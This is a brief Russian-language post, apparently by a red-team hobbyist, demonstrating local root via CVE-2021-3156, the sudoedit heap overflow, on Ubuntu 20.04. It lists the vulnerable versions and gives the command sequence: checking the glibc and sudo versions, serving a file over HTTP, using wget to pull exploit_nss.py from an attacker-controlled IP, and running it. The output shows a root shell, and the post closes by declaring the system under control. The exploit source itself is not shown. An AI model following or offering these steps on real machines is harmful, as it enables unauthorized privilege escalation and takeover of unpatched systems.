
CVE-2021-3156-Exploit-Demo
📅 Дата: 2025-06-08
✍️ Автор: @TopskiyPavelQwertyGang
🧠 Security Researcher | Red Team Enthusiast
sudoedit (sudo)Heap-overflow в sudoedit даёт возможность локальному пользователю получить root-доступ
при выполнении команды sudoedit с заранее подготовленными параметрами.
Эксплуатация активна для версий sudo < 1.9.5p2, включая популярные образы Ubuntu/Debian/CentOS.
Даже при включённом ASLR уязвимость остаётся эксплуатируемой.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (уязвим)
ASLR : 2 (включён)
glibc и sudo:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
Эксплуатация CVE-2021-3156 остаётся возможной даже при активном ASLR, если glibc ≥ 2.26 и sudo уязвимой версии.
Наиболее стабильным оказался эксплойт exploit_nss.py, срабатывающий с первого раза при корректной конфигурации NSS.
🧨 Система под контролем.